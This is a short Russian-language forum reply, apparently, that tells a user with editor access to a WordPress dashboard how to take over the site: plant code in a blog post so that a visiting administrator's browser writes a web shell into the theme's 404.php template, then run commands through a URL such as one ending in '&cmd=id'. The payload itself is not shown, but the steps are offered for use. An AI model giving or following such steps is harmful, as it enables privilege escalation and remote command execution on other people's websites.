Я так понимаю, что у тебя доступ в админку юзера без админских прав.
Скорей всего это редактор.
Попробуй сделать следующее:
Создай любой пост (по теме блога) и пихни в него код
twentythirteen - это имя темы, замени его на свою.
Теперь после того, как любой авторизованный админ откроет твой пост, то выполниться скрипт и шелл будет залит в файл 404.php (шаблон 404 ошибки)
Шелл доступен по адресу
http://site.com/?p=123123123&cmd=id